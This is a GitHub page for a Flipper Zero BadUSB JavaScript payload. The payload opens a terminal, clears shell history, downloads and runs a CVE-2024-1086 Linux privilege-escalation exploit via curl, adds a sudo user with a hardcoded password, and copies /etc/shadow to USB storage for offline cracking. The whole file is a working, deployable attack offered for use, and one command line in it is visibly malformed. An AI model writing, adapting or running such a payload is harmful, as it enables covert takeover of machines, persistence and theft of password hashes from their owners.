-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2024-1086.js
147 lines (131 loc) · 5.33 KB
/
CVE-2024-1086.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
//
// __ ______ ______ ______ __ __ __
// /\ \ /\ ___\ /\__ _\ /\ == \ /\ \ /\ \/ /
// _\_\ \ \ \ __\ \/_/\ \/ \ \ __< \ \ \____ \ \ _"-.
// /\_____\ \ \_____\ \ \_\ \ \_____\ \ \_____\ \ \_\ \_\
// \/_____/ \/_____/ \/_/ \/_____/ \/_____/ \/_/\/_/
//
//
// CVE-2024-1086 exploit, sudo user creation, and exfil /etc/shadow to F0 USB Mass Storage
// Version 1.0
//
// Author: JetBlk (https://github.com/jetblk || https://discord.com/users/415611606408364062/)
//
// CVE-2024-1086 is a universal local privilege escalation Proof-of-Concept exploit.
// More info here: https://github.com/Notselwyn/CVE-2024-1086
//
// This JavaScript payload builds upon the CVE-2024-1086 BadUSB script to take things a step further.
// Phase 1: The exploit has gained elevated privledges
// Phase 2: Adds a new sudo user (line 73, configure the username and password on lines 54-55), then exfils /etc/shadow to usb mass storage for offline cracking.
//
let badusb = require("badusb");
let usbdisk = require("usbdisk");
let storage = require("storage");
let dialog = require("dialog");
// ************
// IMPORTANT: Be sure this matches your computer keyboard layout!!!
// See /ext/badusb/assets/layouts/ for list of supported keyboard layouts.
let layout = "en-US";
// ************
// Executes BadUSB commands with the ability to print to the F0 screen as the script executes, then have an optional delay.
//
// 'command' is required, 'message' and 'delay' are optional
function sendToConsole(script)
{
// script.message, script.command, script.delay
for (let i = 0; i < script.length; i++) {
if(script[i].message) print(script[i].message); // F0 screen message
badusb.println(script[i].command); // BadUSB command to execute
if(script[i].delay) delay(script[i].delay); // Delay
}
}
// ************
// Storage definition for data exfil
let imageName = "PHUN";
let image = "/ext/apps_data/mass_storage/" + imageName + ".img";
let size = 8 * 1024 * 1024;
// ************
// Define your new sudo user
let suUser = "skid";
let suPassword = "Sup3rDup3rPW1!";
// ************
// Primary Script Definition - CVE-2024-1086 exploit
//
// 'command' is required, 'message' and 'delay' are optional
let primary = [
{ command: "unset HISTFILE SAVEHIST PROMPT_COMMAND", delay: 100 },
{ message: "Downloading payload...", command: "curl -L -O https://github.com/Notselwyn/CVE-2024-1086/releases/download/v1.0.0/exploit", delay: 10 },
{ command: "curl -L -O chmod +x exploit", delay: 10 },
{ message: "Executing payload...", command: "./exploit", delay: 5000 },
];
// ************
// Secondary Script Definition - sudo user creation and exfil
//
// 'command' is required, 'message' and 'delay' are optional
let secondary = [
{ message: "Adding new sudo user...", command: "useradd -G sudo,wheel "+suUser+" -p "+suPassword+";", delay: 500 },
{ message: "USB Mount and exfil...", command: "bash -c '", delay: 10 },
{ command: "img=" + imageName + ";", delay: 10 },
{ command: "disk=/dev/disk/by-id/usb-Flipper_Mass_Storage_$img-0:0;", delay: 10 },
{ command: "part=$disk-part1;", delay: 10 },
{ command: "while [ ! -b $part ];do sleep 1;done;", delay: 10 },
{ command: "mnt=$(mktemp -d);", delay: 10 },
{ command: "date=$(date +%Y-%m-%d);", delay: 10 }, // Current Date in YYYY-MM-DD format - see below
{ command: "time=$(date +%s);", delay: 10 }, // Current timestamp - Use the combination of $date and $time to create unique folders/files
{ command: "sudo mount $part $mnt;", delay: 10 },
{ command: "cat /etc/shadow > $mnt/shadow_$date-$time.cp;", delay: 10 }, // exfil whatever you want
{ command: "sync $mnt;", delay: 10 },
{ command: "sudo umount $part", delay: 10 },
{ command: "sudo eject $disk;", delay: 10 },
{ command: "rm -rf $mnt", delay: 10 },
{ command: "'&disown;exit", delay: 10 },
];
// ************
// Get storage ready
print("Checking for Image...");
if (storage.exists(image)) {
print ("Storage Exists.");
}
else {
print ("Creating Storage...");
usbdisk.createImage(image, size);
}
// ************
// Setup BadUSB connection
badusb.setup({ vid: 0xAAAA, pid: 0xBBBB, mfr_name: "Flipper", prod_name: "Zero", layout_path: "/ext/badusb/assets/layouts/" + layout + ".kl" });
print("Waiting for connection");
while (!badusb.isConnected()) {
delay(1000);
}
// ************
// Show a dialog to pause execution until ready
dialog.message("Payload for CVE-2024-1086", "Press OK to start");
// ************
// Open Terminal
badusb.press("CTRL", "ALT", "t");
delay(500);
// ************
// Execute Primary Script
print("Phase 1: Downloading payload for CVE-2024-1086 and executing...");
sendToConsole(primary);
print("Phase 1 complete.");
delay(500);
// ************
// Execute Secondary Script (Exfil)
print("Phase 2: Adding a new sudo user and exfil /etc/shadow to USB...");
sendToConsole(secondary);
print("Phase 2 complete.");
delay(500);
// ************
// Detach Keyboard
badusb.quit();
// ************
// Wait for typing to finish and attach storage, eject and finish
delay(2000);
usbdisk.start(image);
print("Please wait until the terminal closes to eject.");
while (!usbdisk.wasEjected()) {
delay(1000);
}
usbdisk.stop();
print("Script Complete.");